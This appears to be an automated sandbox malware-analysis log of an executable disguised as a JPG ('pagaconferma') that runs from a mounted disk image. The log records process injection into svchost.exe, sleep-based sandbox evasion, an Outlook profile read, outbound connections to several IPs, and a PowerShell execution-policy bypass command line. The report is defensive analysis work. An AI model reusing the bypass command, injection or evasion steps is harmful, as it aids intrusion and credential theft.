        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: apphelp.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: wsock32.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: version.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: winmm.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: mpr.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: wininet.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: userenv.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: edgegdi.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: uxtheme.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: windows.storage.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: wldp.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rtutils.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: schannel.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dpapi.dll
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: g1TLK7mbZD.img | Static file information: File size 1703936 > 1048576
        Source: Binary string: _.pdb source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp
        Source: 9236-pagaconferma-jpg.exe.2.dr | Static PE information: real checksum: 0xa2135 should be: 0x125435
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: \Device\CdRom0\9236-pagaconferma-jpg.exe

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe; API/Special instruction interceptor: Address: 43EB45C
        Source: C:\Windows\SysWOW64\svchost.exe; Memory allocated: 5170000 memory reserve | memory write watch
        Source: C:\Windows\SysWOW64\svchost.exe; Memory allocated: 5700000 memory reserve | memory write watch
        Source: C:\Windows\SysWOW64\svchost.exe; Memory allocated: 7700000 memory reserve | memory write watch
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 600000
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599875
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599766
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599656
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599547
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599437
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599328
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599219
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 599094
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 598985
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 598860
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 598735
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 598610
        Source: C:\Windows\SysWOW64\svchost.exe; Thread delayed: delay time: 598485
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 9887
        Source: C:\Windows\SysWOW64\svchost.exe; Window / User API: threadDelayed 9961
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736; Thread sleep count: 9887 > 30
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -600000s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8512; Thread sleep count: 9961 > 30
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599875s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599766s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599656s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599547s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599437s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599328s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599219s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -599094s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -598985s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -598860s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -598735s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -598610s >= -30000s
        Source: C:\Windows\SysWOW64\svchost.exe TID: 8508; Thread sleep time: -598485s >= -30000s
        Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
        Source: svchost.exe, 00000008.00000002.33968540313.0000000003254000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\svchost.exe; Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\svchost.exe; Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\svchost.exe; Network Connect: 158.101.44.242 80
        Source: C:\Windows\SysWOW64\svchost.exe; Network Connect: 149.154.167.220 443
        Source: C:\Windows\SysWOW64\svchost.exe; Network Connect: 104.21.67.152 443
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F56008
        Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe; Process created: C:\Windows\SysWOW64\svchost.exe "D:\9236-pagaconferma-jpg.exe"
        Source: 9236-pagaconferma-jpg.exe, 00000007.00000002.31559101907.0000000000482000.00000002.00000001.01000000.00000003.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000000.31539891841.0000000000482000.00000002.00000001.01000000.00000003.sdmp, g1TLK7mbZD.img, 9236-pagaconferma-jpg.exe.2.dr; Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
